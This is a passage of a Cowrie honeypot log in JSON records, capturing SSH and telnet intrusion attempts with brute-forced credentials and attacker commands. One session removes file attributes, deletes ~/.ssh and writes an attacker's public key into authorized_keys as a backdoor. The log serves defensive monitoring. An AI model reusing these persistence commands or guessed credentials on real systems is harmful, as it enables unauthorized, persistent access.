sh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:47:18.070798Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei12#$","message":"login attempt [root/Huawei12#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:47:31.369236Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:47:41.058568Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-26T05:47:41.059629Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"3.8","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:47:44.811867Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.session.closed","duration":"32.4","message":"Connection lost after 32.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:47:48.045699Z","src_ip":"212.227.125.160","session":"1276fbea7088"}
{"eventid":"cowrie.session.connect","src_ip":"182.222.81.44","src_port":34433,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9a513883b8d","protocol":"telnet","message":"New connection: 182.222.81.44:34433 (1.2.3.4:23) [session: b9a513883b8d]","sensor":"my-vps","timestamp":"2025-08-26T05:47:57.684870Z"}
{"eventid":"cowrie.session.closed","duration":30.463490962982178,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:48:28.148280Z","src_ip":"182.222.81.44","session":"b9a513883b8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46332,"dst_ip":"1.2.3.4","dst_port":22,"session":"181c0ba0d76f","protocol":"ssh","message":"New connection: 212.227.235.229:46332 (1.2.3.4:22) [session: 181c0ba0d76f]","sensor":"my-vps","timestamp":"2025-08-26T05:48:30.886417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.7.0","message":"Remote SSH version: SSH-2.0-libssh2_1.7.0","sensor":"my-vps","timestamp":"2025-08-26T05:48:30.890067Z","src_ip":"212.227.235.229","session":"181c0ba0d76f"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T05:48:31.012896Z","src_ip":"212.227.235.229","session":"181c0ba0d76f"}
{"eventid":"cowrie.session.closed","duration":"26.1","message":"Connection lost after 26.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:48:57.005254Z","src_ip":"212.227.235.229","session":"181c0ba0d76f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:19.352052Z","src_ip":"212.227.235.229","session":"332802d74fb6"}
{"eventid":"cowrie.session.closed","duration":180.25819039344788,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:19.357396Z","src_ip":"212.227.235.229","session":"332802d74fb6"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":60138,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d4c27e06636","protocol":"ssh","message":"New connection: 93.123.109.181:60138 (1.2.3.4:22) [session: 5d4c27e06636]","sensor":"my-vps","timestamp":"2025-08-26T05:49:30.365953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:49:30.366950Z","src_ip":"93.123.109.181","session":"5d4c27e06636"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:49:30.386042Z","src_ip":"93.123.109.181","session":"5d4c27e06636"}
{"eventid":"cowrie.login.failed","username":"solana","password":"1234567890","message":"login attempt [solana/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T05:49:30.445123Z","src_ip":"93.123.109.181","session":"5d4c27e06636"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:31.467219Z","src_ip":"93.123.109.181","session":"5d4c27e06636"}
{"eventid":"cowrie.session.connect","src_ip":"23.228.85.111","src_port":52794,"dst_ip":"1.2.3.4","dst_port":22,"session":"30617457341d","protocol":"ssh","message":"New connection: 23.228.85.111:52794 (1.2.3.4:22) [session: 30617457341d]","sensor":"my-vps","timestamp":"2025-08-26T05:49:52.659353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:49:52.660120Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:49:52.824857Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.login.success","username":"root","password":"qweasdzxc123","message":"login attempt [root/qweasdzxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:49:53.525394Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:49:53.904692Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:49:53.905433Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:49:53.906620Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.072480Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:49:54.468209Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.468978Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.636297Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.637298Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.session.connect","src_ip":"23.228.85.111","src_port":53288,"dst_ip":"1.2.3.4","dst_port":22,"session":"6874ac4fd971","protocol":"ssh","message":"New connection: 23.228.85.111:53288 (1.2.3.4:22) [session: 6874ac4fd971]","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.800112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.800847Z","src_ip":"23.228.85.111","session":"6874ac4fd971"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:49:54.965726Z","src_ip":"23.228.85.111","session":"6874ac4fd971"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:49:55.665879Z","src_ip":"23.228.85.111","session":"6874ac4fd971"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:56.834166Z","src_ip":"23.228.85.111","session":"6874ac4fd971"}
{"eventid":"cowrie.session.connect","src_ip":"23.228.85.111","src_port":53862,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f81ab93e84a","protocol":"ssh","message":"New connection: 23.228.85.111:53862 (1.2.3.4:22) [session: 0f81ab93e84a]","sensor":"my-vps","timestamp":"2025-08-26T05:49:56.998110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:49:56.999052Z","src_ip":"23.228.85.111","session":"0f81ab93e84a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:49:57.163682Z","src_ip":"23.228.85.111","session":"0f81ab93e84a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:49:57.864892Z","src_ip":"23.228.85.111","session":"0f81ab93e84a"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:58.032100Z","src_ip":"23.228.85.111","session":"30617457341d"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:49:58.033038Z","src_ip":"23.228.85.111","session":"0f81ab93e84a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51412,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d790a008933","protocol":"telnet","message":"New connection: 212.227.125.160:51412 (1.2.3.4:23) [session: 2d790a008933]","sensor":"my-vps","timestamp":"2025-08-26T05:50:43.658973Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:50:43.743065Z","src_ip":"212.227.125.160","session":"2d790a008933"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:50:43.763814Z","src_ip":"212.227.125.160","session":"2d790a008933"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":44816,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f380b1a4ae7","protocol":"ssh","message":"New connection: 45.88.8.186:44816 (1.2.3.4:22) [session: 8f380b1a4ae7]","sensor":"my-vps","timestamp":"2025-08-26T05:51:16.650363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:51:17.193135Z","src_ip":"45.88.8.186","session":"8f380b1a4ae7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:51:17.193855Z","src_ip":"45.88.8.186","session":"8f380b1a4ae7"}
{"eventid":"cowrie.login.success","username":"root","password":"Mohit@123","message":"login attempt [root/Mohit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:51:18.984877Z","src_ip":"45.88.8.186","session":"8f380b1a4ae7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:51:19.458292Z","src_ip":"45.88.8.186","session":"8f380b1a4ae7"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":58890,"dst_ip":"1.2.3.4","dst_port":22,"session":"7365124d8410","protocol":"ssh","message":"New connection: 134.199.225.42:58890 (1.2.3.4:22) [session: 7365124d8410]","sensor":"my-vps","timestamp":"2025-08-26T05:51:20.560224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:51:20.561394Z","src_ip":"134.199.225.42","session":"7365124d8410"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:51:20.717455Z","src_ip":"134.199.225.42","session":"7365124d8410"}
{"eventid":"cowrie.login.failed","username":"tcuser","password":"tcuser","message":"login attempt [tcuser/tcuser] failed","sensor":"my-vps","timestamp":"2025-08-26T05:51:21.381265Z","src_ip":"134.199.225.42","session":"7365124d8410"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:51:22.540021Z","src_ip":"134.199.225.42","session":"7365124d8410"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.115.244","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a8409610b0f","protocol":"ssh","message":"New connection: 64.226.115.244:6102 (1.2.3.4:22) [session: 8a8409610b0f]","sensor":"my-vps","timestamp":"2025-08-26T05:52:06.519354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T05:52:06.546250Z","src_ip":"64.226.115.244","session":"8a8409610b0f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","a